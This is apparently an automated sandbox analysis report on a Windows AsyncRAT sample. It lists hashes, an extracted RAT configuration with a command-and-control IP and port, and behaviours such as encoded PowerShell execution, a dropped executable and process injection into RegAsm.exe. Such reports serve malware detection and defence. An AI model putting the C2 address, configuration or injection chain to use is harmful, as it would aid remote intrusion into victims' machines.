Analysis
- max time kernel: 142s
- max time network: 146s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 17-12-2022 07:24
- Static task: static1
- Behavioral task: behavioral1
  - Sample: 7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe
  - Resource: win10v2004-20220812-en
General
- Target: 7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe
- Size: 5KB
- MD5: 9f785803874e569c4309fb73dc109d37
- SHA1: 6942a4e79d651d6ff8fe9e4fafa6dc48fc5c9ced
- SHA256: 7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a
- SHA512: b69e1189d80f39e29932e8ee07d5ecc37056a04cfb0549c2d61e8dbf1fbb32040412c0da0598ea4095700365aac3d201abaf5aa3c24c3c6d282389863ece00ec
- SSDEEP: 96:iC79tll3VI2vK8eu2tT+vk+zpCI80vK+/0s7DgGKed3ojgrl:iU9t/33v038vkM4I80vK+/0SAed/
Malware Config
Extracted
asyncrat
0.5.7B
System Guard Runtime
85.105.88.221:2531
System Guard Runtime
- delay: 3
- install: false
- install_file: System Guard Runtime
- install_folder: %AppData%
Signatures
- Async RAT payload (1 IoCs)
  Processes (resource, yara_rule):
  - behavioral1/memory/2100-146-0x0000000000400000-0x0000000000412000-memory.dmp: asyncrat
- Blocklisted process makes network request (1 IoCs)
  Processes (flow, pid, process):
  - flow 12, pid 3472, powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (2 IoCs)
  Processes (pid, process):
  - 4908 asda1.exe
  - 4572 asda1.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description, ioc, process):
  - Key value queried: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation (7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe)
- Suspicious use of SetThreadContext (2 IoCs)
  Processes (description, pid, process, target process):
  - PID 4908 set thread context of 2100: asda1.exe -> RegAsm.exe
  - PID 4572 set thread context of 1472: asda1.exe -> RegAsm.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid, process):
  - 3472 powershell.exe
  - 3472 powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description, pid, process):
  - Token: SeDebugPrivilege, 3472, powershell.exe
  - Token: SeDebugPrivilege, 4908, asda1.exe
  - Token: SeDebugPrivilege, 4572, asda1.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  Processes (description, pid, process, target process):
  - PID 3028 wrote to memory of 3472: 7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe -> powershell.exe
  - PID 3028 wrote to memory of 3472: 7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe -> powershell.exe
  - PID 3472 wrote to memory of 4908: powershell.exe -> asda1.exe
  - PID 3472 wrote to memory of 4908: powershell.exe -> asda1.exe
  - PID 3472 wrote to memory of 4908: powershell.exe -> asda1.exe
  - PID 4908 wrote to memory of 2100: asda1.exe -> RegAsm.exe
  - PID 4908 wrote to memory of 2100: asda1.exe -> RegAsm.exe
  - PID 4908 wrote to memory of 2100: asda1.exe -> RegAsm.exe
  - PID 4908 wrote to memory of 2100: asda1.exe -> RegAsm.exe
  - PID 4908 wrote to memory of 2100: asda1.exe -> RegAsm.exe
  - PID 4908 wrote to memory of 2100: asda1.exe -> RegAsm.exe
  - PID 4908 wrote to memory of 2100: asda1.exe -> RegAsm.exe
  - PID 4908 wrote to memory of 2100: asda1.exe -> RegAsm.exe
  - PID 4572 wrote to memory of 1472: asda1.exe -> RegAsm.exe
  - PID 4572 wrote to memory of 1472: asda1.exe -> RegAsm.exe
  - PID 4572 wrote to memory of 1472: asda1.exe -> RegAsm.exe
  - PID 4572 wrote to memory of 1472: asda1.exe -> RegAsm.exe
  - PID 4572 wrote to memory of 1472: asda1.exe -> RegAsm.exe
  - PID 4572 wrote to memory of 1472: asda1.exe -> RegAsm.exe
  - PID 4572 wrote to memory of 1472: asda1.exe -> RegAsm.exe
  - PID 4572 wrote to memory of 1472: asda1.exe -> RegAsm.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\asda1.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\asda1.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- C:\Users\Admin\AppData\Local\Temp\asda1.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\asda1.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\asda1.exe.log
  Filesize: 902B
  MD5: 317ed182314a105b8436cfd8bb3879f6
  SHA1: aa407b44619a9b06b18d8a39ce27a65b959598e1
  SHA256: 34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865
  SHA512: 27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604
- C:\Users\Admin\AppData\Local\Temp\asda1.exe
  Filesize: 14.7MB
  MD5: 2cbd5d9d43c5c49f0580975e9e620808
  SHA1: 17e209b6d6c66882ed78a40d7e0d211760b489a0
  SHA256: 399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403
  SHA512: 26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812
- memory/1472-149-0x0000000000000000-mapping.dmp
- memory/2100-146-0x0000000000400000-0x0000000000412000-memory.dmp (Filesize: 72KB)
- memory/2100-145-0x0000000000000000-mapping.dmp
- memory/3028-135-0x00007FF9F3B20000-0x00007FF9F45E1000-memory.dmp (Filesize: 10.8MB)
- memory/3028-132-0x0000000000010000-0x0000000000018000-memory.dmp (Filesize: 32KB)
- memory/3472-139-0x00007FF9F3B20000-0x00007FF9F45E1000-memory.dmp (Filesize: 10.8MB)
- memory/3472-136-0x00007FF9F3B20000-0x00007FF9F45E1000-memory.dmp (Filesize: 10.8MB)
- memory/3472-134-0x000001AAE81A0000-0x000001AAE81C2000-memory.dmp (Filesize: 136KB)
- memory/3472-133-0x0000000000000000-mapping.dmp
- memory/4908-141-0x0000000000CB0000-0x0000000001B60000-memory.dmp (Filesize: 14.7MB)
- memory/4908-142-0x0000000007040000-0x00000000075E4000-memory.dmp (Filesize: 5.6MB)
- memory/4908-143-0x0000000006C30000-0x0000000006CC2000-memory.dmp (Filesize: 584KB)
- memory/4908-144-0x0000000006D80000-0x0000000006E1C000-memory.dmp (Filesize: 624KB)
- memory/4908-137-0x0000000000000000-mapping.dmp